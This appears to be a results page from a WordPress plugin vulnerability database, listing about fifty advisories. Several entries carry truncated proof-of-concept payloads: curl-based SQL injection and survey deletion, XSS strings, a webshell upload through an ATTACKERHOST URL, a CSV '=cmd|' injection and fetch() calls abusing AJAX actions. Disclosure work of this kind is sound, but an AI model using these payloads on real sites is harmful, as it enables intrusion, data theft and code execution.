4359 matches found
Rating by BestWebSoft < 1.6 - Rating Denial of Service
The plugin does not validate the submitted rating, allowing submission of long integer, causing a Denial of Service on the post/page when a user submit such rating Under Settings - Discussion, uncheck "Comment must be manually approved" Install and Enable Rating BestWebSoft plugin Change "Enable...
Modal Survey < 2.0.1.8.2 - Unauthenticated Arbitrary Survey Update, Deletion and Creation
The plugin AJAX calls including unauthenticated ones did not have capabilities and CSRF checks, allowing unauthenticated users to update, delete or create arbitrary surveys. curl --url https://exmple.com/wp-admin/admin-ajax.php --data "action=ajaxsurvey&sspcmd=delete&surveyid=110251535" curl --ur...
MasterStudy LMS < 3.0.18 - Unauthenticated Instructor Account Creation
Description The plugin does not have proper checks in place during registration allowing anyone to register on the site as an instructor. They can then add courses and/or posts. 1. Visit the Profiles Settings page for the plugin: MS LMS LMS Settings Profiles 2. Ensure that "Disable Instructor...
Ultimate Addons for Contact Form 7 < 3.1.29 - Admin+ Stored XSS
Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Ensure Contact Form 7 is installed,...
FiboSearch < 1.18.0 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks when the unfilteredhtml capability is disallowed Put the following payload in the Woocommerce FiboSearch Autocomplete Products - "No...
Download Manager < 3.2.39 - Unauthenticated brute force of files master key
The plugin uses the uniqid php function to generate the master key for a download, allowing an attacker to brute force the key with reasonable resources giving direct download access regardless of role based restrictions or password protections set for the download. ?php // The full timestamp fro...
Ninja Forms < 3.4.34 - Administrator Open Redirect
The wpajaxnfoauthconnect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place. http://mysite.com/wp-admin/admin-ajax.php?clientid=1&redirect=https://google.com&action=nfoauthconnect...
Slimstat Analytics < 5.0.10 - Contributor+ SQL Injection
Description The plugin is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 5.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers wit...
ND Shortcodes < 7.0 - Contributor+ Stored XSS via Shortcodes
The plugin does not validate and escape numerous of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks ndoptionsteam...
Woo Discount Rules < 2.4.2 - Reflected Cross-Site Scripting
The plugin does not escape a parameter before outputting it back in an attribute of the plugin's discount rule page, leading to Reflected Cross-Site Scripting https://example.com/wp-admin/admin.php?page=woodiscountrules&name="+style=animation-name:rotation+onanimationstart=alert/XSS///...
Formidable Form Builder < 5.0.07 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape its Form's Labels, allowing high privileged users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Create/edit a form, add the following payload to a Field Label: alert/XSS/ The XSS will be triggered when...
The Events Calendar < 6.4.0.1 - Reflected XSS
Description The plugin does not properly sanitize user-submitted content when rendering some views via AJAX. The Events Calendar "...
Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE
Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...
Zyrex Popup < 1.1 - Admin+ Arbitrary File Upload
The plugin does not validate the type of files uploaded when creating a popup, allowing a high privileged user such as an Administrator to upload arbitrary files, even when modifying the file system is disallowed, such as in a multisite install. Create a new popup by filling in anything in the...
MonsterInsights < 8.12.1 - Contributor+ Stored XSS
The plugin does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. As a contributor, add an "Inline Popular Posts" to a...
Nirweb support < 2.8.2 - Unauthenticated SQLi
The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an SQL injection curl https://example.com/wp-admin/admin-ajax.php --data 'action=answerdticket&idform=1 UNION ALL SELECT NULL,NULL,SELECT userpa...
Store Locator WordPress < 1.4.13 - Reflected XSS
Description The plugin does not sanitise and escape an invalid nonce before outputting it back in an AJAX response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin Make a logged in admin open the URL below...
WPCode < 2.0.7 - Contributor+ WPCode Library Auth Key Update/Deletion
The plugin does not have adequate privilege checks in place for several AJAX actions, only checking the nonce. This may lead to allowing any authenticated user who can edit posts to call the endpoints related to WPCode Library authentication such as update and delete the auth key. As a contributo...
Photo Gallery < 1.8.3 - Stored XSS via CSRF
The plugin does not validate and escape some parameters before outputting them back in in JS code later on in another page, which could lead to Stored XSS issue when an attacker makes a logged in admin open a malicious URL or page under their control. Note: The XSS will only trigger for the...
Read More & Accordion < 3.2.7 - Admin+ PHP Object Injection
Description The plugin unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present. To simulate a gadget chain, put the following code in a plugin: class Evil public function wakeup : voi...
Directorist < 7.3.1 - Unauthenticated Email Address Disclosure
The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and any authenticated users https://example.com/wp-admin/admin-ajax.php?action=directoristauthorpagination...
Login with phone number < 1.3.8 - Multiple Admin+ Stored XSS
The plugin does not sanitise and escape plugin settings which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. Plugin settings Style Settings button border radius or other field put to input field: alert'XSS'; Text &...
H5P < 1.15.8 - Contributor+ Stored XSS
Description The plugin does not validate uploads which could allow a Contributors and above to update malicious SVG files, leading to Stored Cross-Site Scripting issues 1. Upload an H5P archive containing a malicious SVG file w/an XSS 2. Example:...
Website Builder by SeedProd < 6.15.22 - Unauthenticated Plugin Page Content Update
Description The plugin does not have authorisation in its seedprodlitenewlpage function, allowing unauthenticated attackers to update the contents of coming-soon, maintenance pages, login and 404 pages set up with the plugin to a blank state As unauthenticated, open the following URL to put the...
KiviCare Management System < 3.2.1 - Subscriber+ Unauthorised AJAX Calls
The plugin does not have proper CSRF and authorisation checks in various AJAX actions, allowing any authenticated users, such as subscriber to call them. Attacks include but are not limited to: Add arbitrary Clinic Admin/Doctors/etc and update plugin's settings Run one of the below commands in th...
WP Sticky Button < 1.4.1 - Unauthenticated Arbitrary Settings Update to Stored XSS
The plugin does not have authorisation and CSRF checks when saving its settings, allowing unauthenticated users to update them. Furthermore, due to the lack of escaping in some of them, it could lead to Stored Cross-Site Scripting issues fetch"/wp-admin/admin-ajax.php", "headers": "content-type":...
VR Calendar <= 2.3.4 - Admin+ LFI
The plugin does not validate user input before using it in a require statement, which could allow high privilege users to perform LFI attacks. The attack could also be performed via a CSRF vector by making a logged in admin open a malicious link...
Library File Manager < 5.2.3 - Subscriber+ Arbitrary File Creation/Upload/Deletion
The plugin is using an outdated version of the elFinder library, which is know to be affected by security issues CVE-2021-32682, and does not have any authorisation as well as CSRF checks in its connector AJAX action, allowing any authenticated users, such as subscriber to call it. Furthermore, a...
Wyzi < 2.4.3 - Reflected Cross-Site Scripting (XSS)
The Wyzi Theme was affected by reflected XSS vulnerabilities in the business search feature https://example.com/business/?keyword=%22%3E%3Cimg%20src=x%20onerror=alert/XSS/%3Easd&wyz-loc-filter-txt=&loc-filter-txt=&loc-filter-lat=&loc-filter-lng=&category=&radius=0...
Smart Slider 3 < 3.5.1.11 - PHP Object Injection
The plugin unserialises the content of an imported file, which could lead to PHP object injection issues when a user import intentionally or not a malicious file, and a suitable gadget chain is present on the site. To simulate a gadget chain, put the following code in a plugin class Evil public...
MapSVG < 6.2.20 - Unauthenticated SQLi
The plugin does not validate and escape a parameter via a REST endpoint before using it in a SQL statement, leading to a SQL Injection exploitable by unauthenticated users. https://example.com/wp-json/mapsvg/v1/maps/2?id=1%27%20AND%20SELECT%2042%20FROM%20SELECTSLEEP5b--+...
KingComposer <= 2.9.6 - Subscriber+ Stored Cross-Site Scripting
The plugin does not have authorisation, CSRF and sanitisation/escaping when creating profile, allowing any authenticated users to create arbitrary ones, with Cross-Site Scripting payloads in them Create profile: fetch"https://example.com/wp-admin/admin-ajax.php?action=kccreateprofile", "headers":...
Broken Link Manager <= 0.6.5 - Authenticated (admin+) SQL Injection
The plugin does not sanitise, validate or escape the url GET parameter before using it in a SQL statement when retrieving an URL to edit, leading to an authenticated SQL injection issue GET...
Access Demo Importer < 1.0.7 - Subscriber+ Arbitrary File Upload
Versions up to, and including, 1.0.6, of the Access Demo Importer WordPress plugin are vulnerable to arbitrary file uploads via the pluginofflineinstaller AJAX action due to a missing capability check in the pluginofflineinstallercallback functionfound in the /inc/demo-functions.php file along wi...
3DPrint Lite < 1.9.1.5 - Unauthenticated Arbitrary File Upload
Description The plugin does not have any authorisation and does not check the uploaded file in its p3dlitehandleupload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as...
Sign-up Sheets < 1.0.14 - Authenticated CSV Injection
The plugin does not not sanitise or validate the Sheet title when generating the CSV to export, which could lead to a CSV injection issue Go to the Sign-up Sheets-- Add New. Enter the following CSV Injection payload in the field "Title", "Details" and "Task" click on save button. =cmd|' /C...
Real Estate 7 < 3.1.1 - Reflected Cross-Site Scripting (XSS)
The theme did not properly sanitise the ctcommunity parameter in its search listing page before outputting it back in it, leading to a reflected Cross-Site Scripting which can be triggered in both unauthenticated or authenticated user context...
Themify Builder < 7.5.8 - Open Redirect
Description The plugin does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue curl -kvL https://www.example.com/wp-login.php \ -e http://arbitrary-referer \ -d...
Insert or Embed Articulate Content into WordPress <= 4.3000000023 - Author+ Upload to RCE
Description The plugin is not properly filtering which file extensions are allowed to be imported on the server, allowing the uploading of malicious code within zip files Note: This must be tested on a web server running Apache 1 Create a new post 2 Add e-Learning block to the post and upload a z...
WooCommerce Product Filter < 1.4.4 - Filter Deletion via CSRF
Description The plugin does not have CSRF check in its bulk action, which could allow attackers to make logged in users delete arbitrary filters via CSRF attack, granted they know the related filter slugs Make a logged in admin open the URL below to make them delete the filter with the slug test1...
Contact Form Builder by Bit Form < 2.2.0 - Admin+ Stored XSS
Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Create a Blank form or select conta...
Process Steps Template Designer < 1.3 - CSRF to Stored Cross-Site Scripting (XSS)
The plugin did not properly check its CSRF nonce in the FontAwesomeField.save method, which could allow attackers to make logged in users capable of editing posts change the Step Icon of arbitrary Process Steps. Due to the lack of sanitisation of the submitted Step icon value, it could also lead ...
EasyEvent <= 1.0.0 - Admin+ Stored XSS
Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfilteredhtml is disallowed 1. Got to https://example.com/wp-admin/options-general.php?page=easyevent 2. In the ID fiel...
Seraphinite Accelerator < 2.2.29 - Authenticated Arbitrary Redirect
Description The plugin does not validate the URL to redirect any authenticated user to, leading to an arbitrary redirect Make a logged in user open https://example.com/wp-admin/admin-ajax.php?action=seraphaccelact&fn=acceptEula&redir=https%3A%2F%2Fwpscan.com...
AdRotate < 5.8.22 - Admin+ SQL Injection
The plugin does not sanitise and escape the adrotateaction before using it in a SQL statement via the adrotaterequestaction function available to admins, leading to a SQL injection Get the nonce from one of the bulk action, for example /wp-admin/admin.php?page=adrotate and look for adrotatenonce ...
BuddyBoss Platform < 2.6.0 - Insecure Direct Object Reference on Like Comment
Description The plugin contains an IDOR vulnerability that allows a user to like a private post by manipulating the ID included in the request POST /wp-admin/admin-ajax.php HTTP/2 Host: buddyboss.example.com Cookie: REDACTED User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10.15; rv:120.0...
Easy Forms for Mailchimp < 6.9.0 - Admin+ Stored Cross-Site Scripting
Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfilteredhtml is disallowed 1 Create a new opt-in form 2 Edit the form, and add a "First name" field. 3 Update the form...
WOOCS < 1.3.9.4 - Contributor+ Stored XSS
The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins...
Easy Video Player < 1.2.2.3 - Contributor+ Stored XSS
The plugin does not sanitize and escapes some parameters, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks. 1. Add a new post and add the payload there: evpembedvideo url='" onerror=alert/XSS/ "' 2. Preview the post, and the XSS will trigger...
Paid Membership Pro < 2.5.3 - Unauthorised Order Information Disclosure
The pmprogetorderjson AJAX action, available to authenticated user did not check for authorisation, allowing any authenticated users to retrieve arbitrary order information such as customer names, email addresses, and order numbers via the orderid parameter...